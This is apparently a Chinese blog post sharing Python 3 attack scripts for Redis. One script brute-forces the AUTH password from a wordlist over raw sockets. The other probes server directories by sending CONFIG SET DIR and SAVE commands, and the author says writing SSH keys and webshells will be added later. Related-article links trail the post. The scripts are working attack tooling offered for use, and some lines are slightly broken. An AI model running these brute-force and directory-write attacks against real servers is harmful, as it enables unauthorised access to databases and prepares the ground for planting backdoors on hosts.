### Redis weakpassword

# 获取password

def passwd_dict(dict):

    with open(str(password_dict), 'r', encoding='utf-8') as f:

        passwd_list = f.readlines()

        passwd = []

        for i in passwd_list:

            passwd.append(i.rstrip('\n'))

    f.close()

    # print(passwd)

    return passwd

# 爆破密码

def intruder(ip, port, passwd):

    try:

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.settimeout(5.0)

        s.connect((ip, int(port)))

        print("[*] 正在对{0}:{1}的密码进行爆破 [*]".format(ip, port))

        for p in passwd:

            send_data = 'AUTH {0}\r\n'.format(p)

            s.send(send_data.encode())

            print("[*] 正在尝试密码 {0} [*]".format(p))

            response = bytes.decode(s.recv(1024))

            if '+OK' in response:

                result = "[!] {0}:{1} 存在弱口令 {2} [!]".format(ip, port, p)

                print(result)

                sys.exit()

    except Exception as e:

        print("[-] {0}:{1} {2} [-]".format(ip, port, e))

### Redis IntruFolder

# 获取目录名称

def getargv(folderdict):

    with open(str(folderdict), 'r', encoding='utf-8') as f:

        folderlsit = f.readlines()

        folder = []

        for i in folderlsit:

            folder.append(i.rstrip('\n'))

    f.close()

    # print(passwd)

    return folder

# 爆破目录

def intruder(ip, port, folderlist):

    try:

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.settimeout(3.0)

        s.connect((ip, int(port)))

        print("[*] 正在对{}的目录进行爆破 [*]".format(ip))

        for p in folderlist:

            password = int('123456')

            send_data = 'CONFIG SET DIR {}\r\n SAVE\r\n'.format(p)

            s.send(send_data.encode())

            # print("[*] 正在尝试目录 {0} [*]".format(p))

            response = bytes.decode(s.recv(1024))

            if not '-ERR Changing directory: No such file or directory' in response:

                result = "[+]{0} [+]".format(p)

                print(result)

                # sys.exit()

            else:

                print('[-]{} [-]'.format(p))

    except Exception as e:

        print("[-] {0}:{1} {2} [-]".format(ip, port, e))

ps:简单记录下,后续会延展下windows的目录爆破或针对性的爆破web目录,以及添加写ssh key和webshell,欢迎各位师傅们评论指正缺点~

python3 Redis利用脚本的更多相关文章

  1. python3 Redis未授权检测脚本

    `import sys import getopt import socket def get_target(): opts, args = getopt.getopt(sys.argv[1:], ' ...

  2. Redis Lua脚本完全入门

    1. 前言 Redis是高性能的KV内存数据库,除了做缓存中间件的基本作用外还有很多用途,比如胖哥以前分享的Redis GEO地理位置信息计算.Redis提供了丰富的命令来供我们使用以实现一些计算.R ...

  3. 利用脚本修改SQL SERVER排序规则

    利用脚本修改SQL SERVER排序规则 编写人:CC阿爸 2014-3-1 l  今年的一项重要工作是对公司所用系统进行繁简的转换,程序转成简体基本很容易解决,但数据库转换成简体,就没那么容易了.经 ...

  4. Python3之利用Cookie模拟登录

    Python3之利用Cookie模拟登录 利用Cookie模拟登录步骤: 1.       在浏览器输入http://demo.bxcker.com,输入用户名和密码登录. 2.登录成功点" ...

  5. Redis Lua脚本调试

    从版本3.2开始,Redis包含一个完整的Lua调试器,可以用来使编写复杂Redis脚本的任务更加简单. 由于Redis 3.2仍处于测试阶段,请unstable从Github 下载Redis 的分支 ...

  6. 部署Redis(脚本安装)

    部署Redis(脚本安装) #/bin/bash # DES:Redis Deploy # Author: will_xue # Email:linuxcto@aliyun.com # DATE : ...

  7. SQL中利用脚本创建database mail.

    SQL中利用脚本创建database mail   编写人:CC阿爸 2014-6-14 多话不讲,请参考以下脚本 use  

  8. SQL中利用脚本恢复数据库

    SQL中利用脚本恢复数据库   编写人:CC阿爸 2014-6-15 在日常SQL数据库的操作中,如何恢复数据库 use master drop database SCS1 RESTORE DATAB ...

  9. python3:利用smtplib库和smtp.qq.com邮件服务器发送邮件

    python3:利用smtplib库和smtp.qq.com邮件服务器发送邮件 使用qq的邮件服务器需要注意的两个地方主要是: 1.协议问题 使用465端口 SSL 协议 2.口令问题 出现SMTPA ...

随机推荐

  1. Tomcat:Tomcat优化(内存,并发,缓存,安全,网络,系统等)详解

    一.Tomcat的安全配置 1.当Tomcat完成安装后首先要做的事情如下:首次安装完成后立即删除webapps下面的所有代码 rm -rf /srv/apache-tomcat/webapps/* ...

  2. ssm跨域解决

    最近挑战杯项目要交了,最后一个开发的项目,还是得好好对待,不知道会不会真香,昨天还是遇到了一些问题,尤其是对接的时候,用postman对接的时候,没有啥问题,结果前端上线对接时,发现ajax无法请求到 ...

  3. C语言常用函数笔记

    strcmp 比较字符串: sscanf 读取格式化的字符串中的数据: memset 初始化内存的"万能函数",通常为新申请的内存进行初始化工作.对一段内存空间全部设置为某个字符, ...

  4. MySQL | Xtrabackup 安装

    rpm方式安装 # xtrabackup 2.4.8 安装包 wget https://www.percona.com/downloads/XtraBackup/Percona-XtraBackup- ...

  5. kong插件Prometheus+grafana图形化展示

    目录 1. 准备工作 3. 为kong添加 prometheus插件 4. 打开kong的metrics支持 4. 配置prometheus.yml添加kong提供的数据信息 5. 在 Grafana ...

  6. git配置多个ssh key

    随着工作的深入,我们通常都会有多个git账户.比如公司gitlab一个账户,github或gitee有一个账户.而平时我们又回通过 配置ssh公私钥认证的方式省去繁琐的登录远程仓库的操作,不同的git ...

  7. Python单元测试框架unittest之批量用例管理(discover)

    前言 我们在写用例的时候,单个脚本的用例好执行,那么多个脚本的时候,如何批量执行呢?这时候就需要用到unittet里面的discover方法来加载用例了.加载用例后,用unittest里面的TextT ...

  8. Python使用笔记005-文件操作(二)

    1.1 打开文件模式 # r r+ r+读是没问题的,写的话,会覆盖原来的内容,文件不存在时会报错# w w+ w+用来新的文件没问题,旧的文件会覆盖原来的内容# a a+ a+写是追加,读不到是因为 ...

  9. [刘阳Java]_MyBatis_实体关系映射_第8讲

    MyBatis既然是一个ORM框架,则它也有像Hibernate那样的一对多,多对多,多对一的实体关系映射功能.下面我们就来介绍一下如何使用MyBatis的实体关系映射 1.MyBatis实体关系映射 ...

  10. Python高阶之多线程锁机制

    '''1.多进程的优势:为了同步完成多项任务,通过提高资源使用效率来提高系统的效率.2.查看线程数:threading.enumerate()函数便可以看到当前线程的数量.3.查看当前线程的名字:th ...